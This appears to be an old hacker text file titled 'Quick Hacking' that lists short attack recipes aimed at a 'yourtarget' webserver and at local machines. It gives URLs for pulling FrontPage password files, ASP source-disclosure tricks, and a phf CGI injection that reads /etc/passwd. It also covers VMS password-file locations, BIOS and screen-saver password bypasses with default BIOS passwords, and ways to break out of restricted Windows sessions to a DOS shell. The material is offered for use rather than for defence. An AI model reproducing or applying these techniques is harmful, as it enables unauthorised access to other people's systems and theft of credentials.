Quick Hacking These are all quick and simple hacks email me if you've got anymore i'll write a few programs that will call on DOS etc soon. The topics covered are vax/vms/windows/dos/macros/bios/etc in no particular order... This is all pretty common knowledge and it can come in useful sometimes . System: Webserver using Microsoft Front Page Extensions Password file: Type the following in your location bar in your browser Command: www.yourtarget.com/_vti_pvt/service.pwd or www.yourtarget.com/_vti_pvt/author.pwd System: Webserver using .asp files Effect: get the source to the .asp file (hard coded passwords ?) either add a . or ::data to the end of the file. Command: www.whatever.com/default.asp. www.whatever.com/default.asp::data System: Webserver Using phf Effect: Run commands that user "nobody" can use ie (cat /etc/passwd) Command: http://www.yourtarget.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd System: Vax Or Vms Function: Will Dump Some files in your Account Has an effect on your reading status too Command: $analyze/process_dump System: Vax Or Vms Function: Where is that startup File Try Here: SYS$MANAGER:ANNOUNCE.TXT or SYS$Announce.txt System: VMS Function: Get password in Command: sys$system:sysuaf.dat Look at the alt.2600 FAQ for a program called Guess_password System: Windows 95 Function: Get rid of password on screen saver Command: just turn off password protection before screen saver comes on Or press ctrl+alt+del if its a non standard screensaver Or edit c:\windows\control.ini change PWprotected=1 to 0 and delete after the Password= System: Windows Function: Gets rid of BIOS password (and resets CMOS settings) Command: Find this file unzip and run killcmos.zip System: BIOS Function: Remove BIOS password Command: Pull out the CMOS battery for 5-10 minutes Then go through setup again once you have installed the battery Best idea is to put in a new password :) then they will think that they just forgot it ]:' System: BIOS Function: BIOS Password Defaults Command: Defaults are RM, BIOS, password, PASSWORD, Tiny, compaq, Award admin, system System: Windows Function: Get past any password protection before boot-up Command: Try booting from a floppy or holding down the shift key during startup System: Windows Function: Shell out (get into DOS) Command: open wordpad or winword etc Open command.com in the word editor save it as something you can use i.e. calc.exe close word or whatever down run calc to get into dos. Or.. Write a small program in tpw or c or whatever that puts you in DOS. Had one written in Turbo Pascal i'll try and get as many as i can in the near future and stick em up here.. or Command: Open word 97 if you've got it Goto insert then object Click on create from file in file type c:\command.com or c:\windows\command.com click OK Right click on the inserted file and goto package object then activate contents or Command: Save this file Letmeout on your desktop type in c:\windows\desktop\letmeout.bat then just click on it. In the .bat file it has one line (see below) call command.com so you can make up your own .bat files simply run wordpad list down your commands and save as whatever.bat or Command: Private Sub cmdCommand_Click() retval = Shell("start /max command.com") End Sub